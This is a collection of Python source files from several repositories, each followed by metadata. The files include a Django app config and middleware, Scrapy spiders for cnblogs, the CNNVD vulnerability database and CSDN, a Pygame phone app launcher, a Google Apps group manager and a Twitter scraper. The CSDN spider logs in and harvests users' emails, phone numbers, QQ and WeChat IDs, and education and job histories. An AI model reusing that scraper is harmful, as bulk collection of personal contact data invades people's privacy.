PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from django.apps import AppConfig
class XMLRPCConfig(AppConfig):
name = 'django_xmlrpc'
label = 'xmlrpc'
verbose_name = 'XMRPC'
def ready(self):
from django_xmlrpc.registry import register_xmlrpc_methods
register_xmlrpc_methods()
| {
"repo_name": "Fantomas42/django-xmlrpc",
"path": "django_xmlrpc/apps.py",
"copies": "1",
"size": "2110",
"license": "bsd-3-clause",
"hash": 3734042660691816400,
"line_mean": 41.2,
"line_max": 79,
"alpha_frac": 0.771563981,
"autogenerated": false,
"ratio": 4.5085470085470085,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 50
} |
"""
@author: mazhicheng
@file: cnblogs_spider.py
@time: 2017/8/9 14:35
"""
from scrapy.selector import Selector
from scrapy.spiders import CrawlSpider, Rule
from scrapy.utils.response import get_base_url
from scrapy.linkextractors import LinkExtractor
from cnblogs.items import *
class CnblogsSpider(CrawlSpider):
# define crawler name
name = 'CnblogsSpider'
# limit crawler domain list, if not here: give up crawler other domain
allowed_domains = ['cnblogs.com']
# define crawler entrance
start_urls = [
'http://www.cnblogs.com/rwxwsblog/default.html?page=1'
]
# define crawler URL rule and assign callback func is `parse_item`
rules = [
Rule(LinkExtractor(allow=('/rwxwsblog/default.html\?page=\d{1,}')),
follow=True,
callback='parse_item')
]
print '-----CnblogsSpider-----'
# define callback func
# use Xpath or CSS Selector
def parse_item(self, response):
items = []
sel = Selector(response)
base_url = get_base_url(response)
postTitle = sel.css('div.day div.postTitle')
postCon = sel.css('div.postCon div.c_b_p_desc')
for index in range(len(postTitle)):
item = CnblogsItem()
item['title'] = postTitle[index].css('a').xpath('text()').extract()[0]
item['link'] = postTitle[index].css('a').xpath('@href').extract()[0]
item['list_url'] = base_url
try:
item['desc'] = postCon[index].xpath('text()').extract()[0]
except Exception as e:
item['desc'] = 'not desc'
items.append(item)
return items
| {
"repo_name": "mazcheng/snippets",
"path": "spider/cnblogs/cnblogs/spiders/cnblogs_spider.py",
"copies": "2",
"size": "1517",
"license": "apache-2.0",
"hash": 1955075751307937000,
"line_mean": 28.1730769231,
"line_max": 73,
"alpha_frac": 0.686882004,
"autogenerated": false,
"ratio": 2.9117082533589254,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9394781736201336,
"avg_score": 0.04076170423151784,
"num_lines": 52
} |
"""
@author: mazhicheng
@file: cnnvd_spider.py
@time: 2017/8/16 18:21
"""
import re
import logging
from scrapy.selector import Selector
from scrapy.spiders import CrawlSpider, Rule
from scrapy.utils.response import get_base_url
from scrapy.linkextractors import LinkExtractor
from scrapy import Request
from cnnvd.items import *
# from cnnvd.settings import LOG_CONF
# logging.config.fileConfig(LOG_CONF)
class CnnvdSpider(CrawlSpider):
name = 'CnnvdSpider'
allowed_domains = ['cnnvd.org.cn']
start_urls = [
'http://www.cnnvd.org.cn/web/vulnerability/querylist.tag?pageno=1099',
'http://www.cnnvd.org.cn/web/cnnvdpatch/querylist.tag?pageno=1494',
]
rules = [
# 漏洞列表页
Rule(LinkExtractor(allow=(r'/web/vulnerability/querylist\.tag', ), deny=('qstartdateXq', 'relLdKey',
'cvCnnvdUpdatedateXq','cpvendor')),
follow=True,
callback='parse_vuln'),
# 补丁列表页
Rule(LinkExtractor(allow=(r'/web/cnnvdpatch/querylist\.tag', ), ),
follow=True,
callback='parse_patch'),
# 漏洞详情页
Rule(LinkExtractor(allow=(r'/web/xxk/ldxqById\.tag', ), deny=('qstartdateXq', 'relLdKey',
'cvCnnvdUpdatedateXq', 'cpvendor')),
follow=True,
callback='parse_vuln_item'),
# 补丁详情页
Rule(LinkExtractor(allow=(r'/web/xxk/bdxqById\.tag', ), ),
follow=True,
callback='parse_patch_item'),
]
host = 'http://www.cnnvd.org.cn'
PAGE_NO = re.compile(r'(.*?pageno=)(\d+)')
VULN_ID = re.compile(r'.*?=(CNNVD-\d+-\d+)')
def parse_vuln(self, response):
logging.critical(response.url)
vuln_selector = Selector(response)
vuln_href = vuln_selector.xpath("//a[@class='a_title2']/@href")
for href in vuln_href.extract():
abs_url = self.host + href
yield Request(abs_url, callback=self.parse_vuln_item)
try:
if 'pageno' in response.url:
comm_url, page_no = self.PAGE_NO.search(response.url).groups()
abs_url = comm_url + str(int(page_no)+1)
else:
abs_url = self.host + '/web/vulnerability/querylist.tag?pageno=2'
yield Request(abs_url, callback=self.parse_vuln)
except Exception as e:
logging.error('parse_vuln URL[%s] ERR[%s]' % (response.url, e))
def parse_patch(self, response):
logging.critical(response.url)
patch_selector = Selector(response)
patch_href = patch_selector.xpath("//a[@class='a_title2']/@href")
for href in patch_href.extract():
abs_url = self.host + href
yield Request(abs_url, callback=self.parse_patch_item)
try:
if 'pageno' in response.url:
comm_url, page_no = self.PAGE_NO.search(response.url).groups()
abs_url = comm_url + str(int(page_no) + 1)
else:
abs_url = self.host + '/web/cnnvdpatch/querylist.tag?pageno=2'
yield Request(abs_url, callback=self.parse_patch)
except Exception as e:
logging.error('parse_vuln URL[%s] ERR[%s]' % (response.url, e))
def parse_vuln_item(self, response):
logging.critical(response.url)
vuln_item_selector = Selector(response)
vuln_detail = vuln_item_selector.xpath("//div[contains(@class, 'detail_xq') and contains(@class, 'w770')]")
vuln_notice_refer_entry_patch = vuln_item_selector.xpath("//div[contains(@class, 'd_ldjj') and contains(@class, 'm_t_20')]")
vuln_item = CnnvdVulnItem()
vuln_item['vuln_id'] = self._clean_extract_first(vuln_detail, 'ul/li[1]/span/text()')
vuln_item['name'] = self._clean_extract_first(vuln_detail, 'h2/text()')
vuln_item['harm_level'] = self._clean_extract_first(vuln_detail, 'ul/li[2]/a/text()')
vuln_item['cve_id'] = self._clean_extract_first(vuln_detail, 'ul/li[3]/a/text()')
vuln_item['vuln_type'] = self._clean_extract_first(vuln_detail, 'ul/li[4]/a/text()')
vuln_item['report_time'] = self._clean_extract_first(vuln_detail, 'ul/li[5]/a/text()')
vuln_item['threat_type'] = self._clean_extract_first(vuln_detail, 'ul/li[6]/a/text()')
vuln_item['update_time'] = self._clean_extract_first(vuln_detail, 'ul/li[7]/a/text()')
vuln_item['company'] = self._clean_extract_first(vuln_detail, 'ul/li[8]/a/text()')
vuln_item['vuln_source'] = self._clean_extract_first(vuln_detail, 'ul/li[9]/a/text()')
vuln_item['vuln_abstract'] = self._merge_clean_extract(vuln_item_selector, "//div[@class='d_ldjj']/p/text()")
vuln_item['vuln_abstract'] += self._merge_clean_extract(vuln_item_selector, "//div[@class='d_ldjj']/p/a/text()")
vuln_item['vuln_notice'] = self._merge_clean_extract(vuln_item_selector,
'/html/body/div[4]/div/div[1]/div[4]/p/text()')
vuln_item['vuln_notice'] += self._merge_clean_extract(vuln_item_selector,
'/html/body/div[4]/div/div[1]/div[4]/p/a/text()')
vuln_item['refer_site'] = self._merge_clean_extract(vuln_item_selector,
'/html/body/div[4]/div/div[1]/div[5]/p/text()')
vuln_item['refer_site'] += self._merge_clean_extract(vuln_item_selector,
'/html/body/div[4]/div/div[1]/div[5]/p/a/text()')
vuln_item['affect_entry'] = self._merge_clean_extract(vuln_item_selector,
'/html/body/div[4]/div/div[1]/div[6]/p/text()')
vuln_item['affect_entry'] += self._merge_clean_extract(vuln_item_selector,
'/html/body/div[4]/div/div[1]/div[6]/p/a/text()')
vuln_item['patch'] = self._merge_clean_extract(vuln_item_selector,
'/html/body/div[4]/div/div[1]/div[7]/p/text()')
vuln_item['patch'] += self._merge_clean_extract(vuln_item_selector,
'/html/body/div[4]/div/div[1]/div[7]/p/a/text()')
yield vuln_item
def parse_patch_item(self, response):
logging.critical(response.url)
patch_item_selector = Selector(response)
patch_detail = patch_item_selector.xpath("//div[contains(@class, 'detail_xq') and contains(@class, 'w770')]")
patch_item = CnnvdPatchItem()
patch_item['patch_id'] = self._clean_extract_first(patch_detail, 'ul/li[1]/text()')
patch_item['name'] = self._clean_extract_first(patch_detail, 'h2/text()')
patch_item['size'] = self._clean_extract_first(patch_detail, 'ul/li[2]/text()')
patch_item['important_level'] = self._clean_extract_first(patch_detail, 'ul/li[3]/text()')
patch_item['report_time'] = self._clean_extract_first(patch_detail, 'ul/li[4]/text()')
patch_item['company'] = self._clean_extract_first(patch_detail, 'ul/li[5]/text()')
patch_item['company_homepage'] = self._clean_extract_first(patch_detail, 'ul/li[6]/a/text()')
patch_item['md5_val'] = self._clean_extract_first(patch_detail, 'ul/li[7]/text()')
patch_item['refer_site'] = self._merge_clean_extract(patch_item_selector, "//div[@class='d_ldjj']/p/text()")
patch_item['refer_site'] += self._merge_clean_extract(patch_item_selector, "//div[@class='d_ldjj']/p/a/text()")
patch_item['vuln'] = self._merge_clean_extract(patch_item_selector, "//a[@class='a_title2']/@href", ', ')
patch_item['vuln'] = self.VULN_ID.findall(patch_item['vuln'])
yield patch_item
def _clean_extract_first(self, selector, xpath_path, default_str=''):
try:
extract_first_result = selector.xpath(xpath_path).extract_first(default_str)
return extract_first_result.strip()
except Exception as e:
return ''
def _merge_clean_extract(self, selector, xpath_path, join_str=''):
try:
clean_extract_result = map(lambda x: x.strip(), selector.xpath(xpath_path).extract())
return join_str.join(clean_extract_result)
except Exception as e:
return '' | {
"repo_name": "mazcheng/snippets",
"path": "spider/cnnvd/cnnvd/spiders/cnnvd_spider.py",
"copies": "1",
"size": "7357",
"license": "apache-2.0",
"hash": -7421649497902887000,
"line_mean": 44.4534161491,
"line_max": 126,
"alpha_frac": 0.6647533142,
"autogenerated": false,
"ratio": 2.5882561018747787,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.37530094160747784,
"avg_score": null,
"num_lines": null
} |
"""
@author: mazhicheng
@file: csdn_spider.py
@time: 2017/8/10 11:14
"""
import json
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.utils.response import get_base_url
from scrapy.linkextractors import LinkExtractor
from scrapy import Request, FormRequest
from csdn.items import *
class CsdnSpider(CrawlSpider):
name = 'CsdnSpider'
allowed_domains = [
'passport.csdn.net',
'csdn.net',
'my.csdn.net'
]
formdata = {
'username': 'XXX',
'password': 'XXX'
}
start_urls = [
'http://www.csdn.net/',
'http://passport.csdn.net/account/login',
'http://my.csdn.net/'
]
followers = set()
rules = [
Rule(LinkExtractor(allow=('csdn\.net')),
follow=True),
]
def start_requests(self):
return [Request('https://passport.csdn.net/account/login', callback=self.parse_login)]
def parse_login(self, response):
return [FormRequest.from_response(response, formdata=self.formdata, callback=self.after_login)]
def after_login(self, response):
return [
Request('http://my.csdn.net/service/main/my_relation?pageno=1&pagesize=50&type=follow',
callback=self.parse_attention),
Request('http://my.csdn.net/service/main/my_relation?pageno=2&pagesize=50&type=follow',
callback=self.parse_attention),
]
def parse_attention(self, response):
raw_followers = response.body
for user_info in json.loads(raw_followers)['result']['list']:
homepage = 'http://my.csdn.net/' + user_info[u'username']
yield Request(homepage, callback=self.parse_person)
def parse_person(self, response):
sel = Selector(response)
base_url = get_base_url(response)
person_info_con = sel.css('div.persional_property div.person_info_con')
person_photo = person_info_con.css('dl.person-photo')
person_info = person_info_con.css('dl.person-info')
person_detail = sel.css('div.persion_section div#divDetail.aboutMe div.myDetails.activeContent')
item = CsdnPeopleItem()
item['name'] = person_info.xpath('dt/span/text()').extract_first()
item['homepage'] = base_url
item['avatar_url'] = person_photo.xpath('dt/a/img/@src').extract_first()
item['focus_num'] = person_photo.xpath('dd[1]/b/text()').extract_first()
item['fans_num'] = person_photo.xpath('dd[2]/b/text()').extract_first()
# visited
# http://my.csdn.net/service/main/visited?username=feng88724
yield Request('http://my.csdn.net/service/main/getSorce?username=' + item['name'],
meta={'item': item}, callback=self.parse_score)
def parse_score(self, response):
item = response.meta['item']
score = json.loads(response.body)['result']['score']
item['score'] = {k: v.get('level', 'null') for k, v in score.items()}
yield Request('http://my.csdn.net/service/main/get_knownarea_list?username=' + item['name'],
meta={'item': item}, callback=self.parse_field)
def parse_field(self, response):
item = response.meta['item']
field = json.loads(response.body)['result']
item['field'] = [fi.get('name', 'null') for fi in field]
yield Request('http://my.csdn.net/service/main/uc', method='POST', meta={'item': item}, body=self.post_param(item['name'], 'getSkill'),
callback=self.parse_skill)
def parse_skill(self, response):
item = response.meta['item']
body = json.loads(response.body)
if str(body['err']) == '0':
skill = body['result']
item['skill'] = [sk.get('skillname', 'null') for sk in skill]
else:
item['skill'] = 'null'
yield Request('http://my.csdn.net/service/main/uc', method='POST', meta={'item': item}, body=self.post_param(item['name'], 'getEduExp'),
callback=self.parse_edu)
def parse_edu(self, response):
item = response.meta['item']
body = json.loads(response.body)
if str(body['err']) == '0':
edu = body['result']
item['edu_experience'] = [ed.get('edustartdate', 'null') + ' ~ ' + ed.get('eduenddate', 'null')
+ ' @' + ed.get('schoolname', 'null') + ' <' + ed.get('majorstr', 'null') + '>' for ed in edu]
else:
item['edu_experience'] = 'null'
yield Request('http://my.csdn.net/service/main/uc', method='POST', meta={'item': item}, body=self.post_param(item['name'], 'getWorkExp'),
callback=self.parse_job)
def parse_job(self, response):
item = response.meta['item']
body = json.loads(response.body)
if str(body['err']) == '0':
job = body['result']
item['job_experience'] = [jb.get('workbegindate', 'null') + ' ~ ' + jb.get('workenddate', 'null')
+ ' @' + jb.get('orgname', 'null') + ' <' + jb.get('job', 'null') + '|' + jb.get('workdesc', 'null') + '>' for jb in job]
else:
item['job_experience'] = 'null'
yield Request('http://my.csdn.net/service/main/uc', method='POST', meta={'item': item}, body=self.post_param(item['name'], 'getContact'),
callback=self.parse_contact)
def parse_contact(self, response):
item = response.meta['item']
body = json.loads(response.body)
if str(body['err']) == '0':
contact = body['result']
item['email'] = contact['pubemail']
item['phone'] = contact['submobile']
for info in contact['contactinfo']:
if int(info['type']) == 70:
item['qq'] = info['value']
elif int(info['type']) == 110:
item['wechat'] = info['value']
else:
item['qq'] = 'null'
item['wechat'] = 'null'
else:
item['qq'] = 'null'
item['wechat'] = 'null'
else:
item['email'] = 'null'
item['qq'] = 'null'
item['wechat'] = 'null'
yield item
def post_param(self, usename, method_name):
post_data = {'params': {'username':'%s' % str(usename),'method':'%s' % method_name}}
return json.dumps(post_data) | {
"repo_name": "mazcheng/snippets",
"path": "spider/csdn/csdn/spiders/csdn_spider.py",
"copies": "1",
"size": "5623",
"license": "apache-2.0",
"hash": 6991924750987031000,
"line_mean": 34.5949367089,
"line_max": 139,
"alpha_frac": 0.6475191179,
"autogenerated": false,
"ratio": 2.838465421504291,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3985984539404291,
"avg_score": null,
"num_lines": null
} |
"""App specific middleware"""
# Django imports
from django.views.defaults import page_not_found
from django.http import HttpResponseNotFound, HttpResponseForbidden, HttpResponseServerError
from django.template import loader
# Sekizai imports
from sekizai.context import SekizaiContext as Context
# app imports
from oweb.exceptions import OWebException, OWebAccountAccessViolation, OWebParameterMissingException, OWebIllegalParameterException
class OWebExceptionMiddleware(object):
"""Catches OWeb specific Exceptions"""
def process_exception(self, req, e):
# found one of this apps exceptions
if isinstance(e, OWebException):
# unauthorized access to an account
if isinstance(e, OWebAccountAccessViolation):
t = loader.get_template('oweb/403.html')
c = Context()
return HttpResponseForbidden(t.render(c))
# missing parameter
# Which status code is right, if a parameter is missing? Going with 500
if isinstance(e, (OWebParameterMissingException,
OWebIllegalParameterException)):
t = loader.get_template('oweb/500.html')
c = Context()
return HttpResponseServerError(t.render(c))
# handle with a 404
return HttpResponseNotFound(
page_not_found(req,
template_name='oweb/404.html')
)
return None
| {
"repo_name": "Mischback/django-oweb",
"path": "oweb/middleware.py",
"copies": "1",
"size": "1486",
"license": "mit",
"hash": -6205983053936320000,
"line_mean": 40.2777777778,
"line_max": 131,
"alpha_frac": 0.6520861373,
"autogenerated": false,
"ratio": 4.747603833865814,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0020967243453011955,
"num_lines": 36
} |
import pygame, sys
from pygame.locals import *
import imp
class App():
def __init__(self, fona):
self.fona = fona
#Important Variables and constants
self.open_apps = False
self.pixel = 0
self.SPEED = 2
self.opened = False
self.close_apps = False
self.app_to_open = None
self.opened_app = None
self.blit_logo = True
#Setup default apps
self.get_app_order()
self.load_logos()
self.import_app()
self.first_run = True
def import_app(self):
#Import stock apps
loaded = []
self.app_objects = []
#Load modules
for i in self.app_order:
loaded.append(imp.load_source(i + '.Run', '/home/pi/tyos/apps/' + i +'/' + i + '.py'))
#Load objects
for i in loaded:
self.app_objects.append(i.Run(self.fona))
def open_app(self):
if self.app_to_open != None:
self.blit_logo = False
if self.first_run or self.opened_app != self.app_to_open:
self.opened_app = self.app_to_open
self.app_objects[self.app_to_open].on_first_run()
self.first_run = False
self.app_objects[self.app_to_open].run_app()
if self.app_objects[self.app_to_open].exit:
self.app_objects[self.app_to_open].exit = False
if self.app_objects[self.app_to_open].next_app != None:
self.app_to_open = self.app_order.index(self.app_objects[self.app_to_open].next_app)
else:
self.app_to_open = None
self.blit_logo = True
self.first_run = True
def load_logos(self):
#Load the first four app's logo
logos = {'surfaces':[], 'rects':[]}
for i in range(0, 4):
logos['surfaces'].append(pygame.image.load('/home/pi/tyos/apps/' + self.app_order[i] + '/' + self.app_order[i] + '.png'))
logos['rects'].append(logos['surfaces'][i].get_rect())
for i in range(0, 4):
logos['rects'][i].centery = -50
logos['rects'][i].centerx = 40 + 80 * i
self.logos = logos
def get_app_order(self):
#Get the order of the apps to be blitted
order_file = open('/home/pi/tyos/apps/order.txt', 'r')
order = order_file.readlines()
if len(order) < 4:
print 'Not enough apps in storage!'
pygame.quit()
sys.exit()
for i in range(0, len(order)):
order[i] = order[i].rstrip()
self.app_order = order
def check(self, event):
if event.type == MOUSEBUTTONDOWN:
#Check for events inside of app
if self.app_to_open != None:
self.app_objects[self.app_to_open].get_events(event)
#Check for touch to open apps bar
if event.pos[1] < 31 and self.opened == False:
self.open_apps = True
self.close_apps = False
self.opened = True
#Check for touch to close app bar
if event.pos[1] > 131 and self.opened:
self.open_apps = False
self.close_apps = True
self.opened = False
#Check for touch to open an app
if self.opened and self.logos['rects'][0].centery == 50:
if event.pos[0] < 80 and event.pos[1] < 100:
self.app_to_open = 0
if event.pos[0] < 160 and event.pos[0] > 80 and event.pos[1] < 100:
self.app_to_open = 1
if event.pos[0] < 240 and event.pos[0] > 160 and event.pos[1] < 100:
self.app_to_open = 2
if event.pos[0] < 320 and event.pos[0] > 240 and event.pos[1] < 100:
self.app_to_open = 3
return self.open_apps
def open(self, update, surfaces, rects, reception, bat):
if self.open_apps:
update = True
#Add one to pixels moved
self.pixel += self.SPEED
#Move the images
for i in surfaces['rects']:
i.y += self.SPEED
for i in rects['rects']:
i.height += self.SPEED
for i in reception['rects']:
i.y += self.SPEED
for i in self.logos['rects']:
i.y += self.SPEED
bat['rects'].y += self.SPEED
if self.pixel == 100:
self.open_apps = False
update = False
if self.close_apps:
update = True
#Add one to pixels moved
self.pixel -= self.SPEED
#Move the images
for i in surfaces['rects']:
i.y -= self.SPEED
for i in rects['rects']:
i.height -= self.SPEED
for i in reception['rects']:
i.y -= self.SPEED
for i in self.logos['rects']:
i.y -= self.SPEED
bat['rects'].y -= self.SPEED
if self.pixel == 0:
self.close_apps = False
update = False
return update, surfaces, rects, reception, bat
if __name__ == '__main__':
t = App()
| {
"repo_name": "spadgenske/TYOS",
"path": "src/apps.py",
"copies": "1",
"size": "5394",
"license": "mit",
"hash": 5761531692080604000,
"line_mean": 33.5769230769,
"line_max": 133,
"alpha_frac": 0.4959213941,
"autogenerated": false,
"ratio": 3.7641311933007677,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9707721740217672,
"avg_score": 0.01046616943661919,
"num_lines": 156
} |
#!/apps/python-2.7/bin/python
# -*- coding: utf-8 -*-
import os
import os.path
import glob
import sys
from apiclient.discovery import build
from apiclient.errors import HttpError
import httplib2
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client import tools
import argparse
import simplejson as json
import pprint
import codecs
import yaml
import re
from termcolor import colored
from const import *
from utils import *
GROUP_PARAMS = ['name', 'description', 'aliases', 'allowExternalMembers',
'allowGoogleCommunication',
'allowWebPosting', 'archiveOnly', 'customReplyTo',
'includeInGlobalAddressList', 'isArchived',
'maxMessageBytes', 'membersCanPostAsTheGroup',
'messageDisplayFont', 'messageModerationLevel',
'primaryLanguage', 'replyTo',
'sendMessageDenyNotification', 'showInGroupDirectory',
'spamModerationLevel', 'whoCanContactOwner',
'whoCanInvite', 'whoCanJoin', 'whoCanLeaveGroup',
'whoCanPostMessage', 'whoCanViewGroup',
'whoCanViewMembership']
class GaService(object):
def __init__(self, cred_path = CREDENTIALS_PATH):
storage = Storage(cred_path)
credentials = storage.get()
if credentials is None or credentials.invalid:
sys.exit(1)
http = httplib2.Http()
http = credentials.authorize(http)
sv1 = build('admin', 'directory_v1', http=http)
sv2 = build('groupssettings', 'v1', http=http)
self.service = {}
self.service['group'] = sv1.groups()
self.service['member'] = sv1.members()
self.service['settings'] = sv2.groups()
def group_sv(self):
return self.service['group']
def member_sv(self):
return self.service['member']
def settings_sv(self):
return self.service['settings']
def list_local_groups(self, domain, dir):
groups = []
for f in glob.glob("%s/*@%s.yml" % (dir, domain)):
email = os.path.splitext(os.path.basename(f))[0]
group_obj = GaGroup()
group_obj.set_group_key(email)
groups.append(group_obj)
return groups
def list_cloud_groups(self, domain):
groups = []
pageToken = None
while True:
params = { 'domain': domain }
if pageToken:
params['pageToken'] = pageToken
r = self.service['group'].list(**params).execute()
if r.has_key('groups'):
for group in r['groups']:
group_obj = GaGroup()
group_obj.set_group_key(group['email'])
groups.append(group_obj)
if r.has_key('nextPageToken'):
pageToken = r['nextPageToken']
else:
break
return groups
class GaGroup(object):
def __init__(self):
self.local_dir = '.'
self.local = {}
self.cloud = {}
self.group_key = None
def set_group_key(self, group_key):
self.group_key = group_key
def set_local_dir(self, local_dir):
self.local_dir = local_dir
def group_key(self):
return self.group_key
def load_cloud(self, sv):
r = sv.settings_sv().get(groupUniqueId=self.group_key).execute()
self.cloud = r
members = self.load_cloud_member(sv)
self.cloud['members'] = []
self.cloud['owners'] = []
self.cloud['managers'] = []
for member in members:
if member['role'] == 'MEMBER':
self.cloud['members'].append(member['email'])
elif member['role'] == 'MANAGER':
self.cloud['managers'].append(member['email'])
elif member['role'] == 'OWNER':
self.cloud['owners'].append(member['email'])
self.cloud['members'].sort()
self.cloud['owners'].sort()
self.cloud['managers'].sort()
r = sv.group_sv().get(groupKey=self.group_key).execute()
if r.has_key('aliases'):
self.cloud['aliases'] = r['aliases']
def load_cloud_member(self, sv):
members = []
pageToken = None
while True:
params = { 'groupKey': self.group_key }
if pageToken:
params['pageToken'] = pageToken
r = sv.member_sv().list(**params).execute()
if r.has_key('members'):
for member in r['members']:
members.append(member)
if r.has_key('nextPageToken'):
pageToken = r['nextPageToken']
else:
break
return members
def dump_data(self, data, stream):
stream.write("email: %s\n" % data['email'])
for key in GROUP_PARAMS:
if data.has_key(key):
if key in ['name', 'description']:
stream.write("%s: \"%s\"\n" % (key, re.sub(r'"', '\\"', data[key]).encode('utf-8')))
elif key in ['maxMessageBytes']:
stream.write("%s: %s\n" % (key, data[key]))
elif key in ['aliases']:
if len(data[key]):
stream.write("%s:\n" % key)
for val in data[key]:
stream.write(" - %s\n" % val)
else:
stream.write("%s: []\n" % key)
else:
stream.write("%s: \"%s\"\n" % (key, data[key]))
if len(data['members']):
stream.write("members:\n")
for member in data['members']:
stream.write(" - %s\n" % member)
else:
stream.write("members: []\n")
if len(data['managers']):
stream.write("managers:\n")
for member in data['managers']:
stream.write(" - %s\n" % member)
else:
stream.write("managers: []\n")
if len(data['owners']):
stream.write("owners:\n")
for member in data['owners']:
stream.write(" - %s\n" % member)
else:
stream.write("owners: []\n")
def dump_cloud(self):
self.dump_data(self.cloud, sys.stdout)
def local_file(self):
file = "%s/%s.yml" % (self.local_dir, self.group_key)
return file
def export(self):
f = open(self.local_file(), 'w')
self.dump_data(self.cloud, f)
f.close()
def load_local(self):
file = self.local_file()
if os.path.exists(file):
self.local = yaml.load(open(file).read().decode('utf-8'))
def diff(self):
if not self.local.has_key('name'):
self.load_local()
for key in GROUP_PARAMS:
if self.local.has_key(key) and self.cloud.has_key(key):
if self.local[key] != self.cloud[key]:
print colored("-%s: %s (cloud)" % (key, self.cloud[key]), 'red')
print colored("+%s: %s (local)" % (key, self.local[key]), 'green')
elif self.local.has_key(key):
print colored("+%s: %s (local)" % (key, self.local[key]), 'green')
elif self.cloud.has_key(key):
print colored("-%s: %s (cloud)" % (key, self.cloud[key]), 'red')
for key in ['members', 'managers', 'owners']:
only_cloud = [x for x in self.cloud[key] if x not in self.local[key]]
only_local = [x for x in self.local[key] if x not in self.cloud[key]]
if len(only_cloud) or len(only_local):
print "%s:" % key
for x in only_cloud:
print colored("- - %s (cloud)" % x, 'red')
for x in only_local:
print colored("+ - %s (local)" % x, 'green')
def apply(self, sv):
if not self.local.has_key('name'):
self.load_local()
body = {}
update_keys = []
for key in GROUP_PARAMS:
if key not in ['name', 'description', 'aliases']:
if self.cloud[key] != self.local[key]:
body[key] = self.local[key]
if len(body) > 0:
r = sv.settings_sv().update(groupUniqueId=self.group_key, body=body).execute()
print "updated"
else:
print "no changes"
def csv(self):
if not self.local.has_key('name'):
self.load_local()
description = re.sub(r'\s*\[sateraito.*$', '', self.local['description'])
return '"IU","%s","%s","%s","%s","%s"' % (self.local['email'],
self.local['name'],
','.join(self.local['members']),
','.join(self.local['owners']),
re.sub(r'"', '""', description))
def csv_header():
return '"command","email","name","members","owners","comment"'
def main():
parser = argparse.ArgumentParser()
parser.add_argument('operation',
choices=['show', 'diff', 'export', 'apply', 'csv'],
help='operationo')
parser.add_argument('targets', nargs='+', help='domain or email list')
parser.add_argument('--dir', help='local data directory', default='.')
parser.add_argument('--encoding',
choices=['utf-8', 'sjis'],
help='csv output encoding',
default='utf-8')
args = parser.parse_args()
sv = GaService()
groups = []
for target in args.targets:
if target.find('@') >= 0:
g = GaGroup()
g.set_group_key(target)
groups.append(g)
else:
if args.operation == 'csv':
groups.extend(sv.list_local_groups(target, args.dir))
else:
groups.extend(sv.list_cloud_groups(target))
if args.operation == 'csv':
print csv_header()
for group in groups:
group.set_local_dir(args.dir)
if args.operation != 'csv':
print group.group_key
group.load_cloud(sv)
if args.operation == 'show':
group.dump_cloud()
elif args.operation == 'export':
group.export()
elif args.operation == 'diff':
group.diff()
elif args.operation == 'apply':
group.apply(sv)
elif args.operation == 'csv':
print group.csv().encode(args.encoding)
if __name__ == '__main__':
main()
| {
"repo_name": "yteraoka/googleapps-directory-tools",
"path": "groupman.py",
"copies": "1",
"size": "10706",
"license": "apache-2.0",
"hash": 7967581683090992000,
"line_mean": 34.3333333333,
"line_max": 104,
"alpha_frac": 0.5077526621,
"autogenerated": false,
"ratio": 3.999252895031752,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9992247016947768,
"avg_score": 0.0029517080367968108,
"num_lines": 303
} |
## appsterdam twitter data
## usage: we open a csv file with names of companies or phenomenon that are
## of interest to the amsterdam tech community. these subjects are
## searched on twitter. the tweets will give us a new list of users and
## hashtags. these will be searched again and through a breadth first
## search we will come to an even larger graph. this graph is then stored
## with a date. this script needs to be rerun such that the graph is updated
## we also keep the messages in the tweets
## example calls:
## $ python mega_twitter_parser.py
## prerequisites:
## python 2.7.3
## nltk package
## numpy
## output : a csv file containing all the connections between users/hashtages
## a csv file containing the actual tweets
import os, sys; sys.path.insert(0, os.path.join("..", ".."))
from pattern.web import Twitter, hashtags
from pattern.db import Datasheet, pprint
import numpy as np
from nltk.corpus import stopwords
import nltk
from nltk.tokenize import word_tokenize, wordpunct_tokenize, sent_tokenize
from nltk.collocations import *
bigram_measures = nltk.collocations.BigramAssocMeasures()
trigram_measures = nltk.collocations.TrigramAssocMeasures()
import re
from collections import Counter
import sys
import itertools
import csv
import unicodedata
import time
from datetime import date
twitter_subjects = np.genfromtxt('twitter_subjects.csv', skip_header=False, delimiter=',', dtype='|S')
try:
# We store tweets in a Datasheet that can be saved as a text file (comma-separated).
# In the first column, we'll store a unique ID for each tweet.
# We only want to add the latest tweets, i.e., those we haven't previously encountered.
# With an index on the first column we can quickly check if an ID already exists.
# The index becomes important once more and more rows are added to the table (speed).
table = Datasheet.load("current_tweets.csv")
index = dict.fromkeys(table.columns[0], True)
except:
table = Datasheet()
index = {}
engine = Twitter(language="en")
tweet_csv = []
table = []
for twitter_subject in twitter_subjects:
# With cached=False, a live request is sent to Twitter,
# so we get the latest results for the query instead of those in the local cache.
for tweet in engine.search(twitter_subject, count=275, cached=False):
# Create a unique ID based on the tweet content and author.
new_line = '@'+tweet.author + ' , ' + tweet.description + ' , ' + str(tweet.values()[5]) + ' , ' + str(tweet.url)
id = hash(tweet.author + tweet.description)
# Only add the tweet to the table if it doesn't already contain this ID.
if len(table) == 0 or id not in index:
tweet_csv.append(new_line)
norm_descr = unicodedata.normalize('NFKD', tweet.description).encode('ascii','ignore')
norm_author = unicodedata.normalize('NFKD', tweet.author).encode('ascii','ignore')
table = table + ['@'+ str(norm_author) + ' ' + str(norm_descr)]
index[id] = True
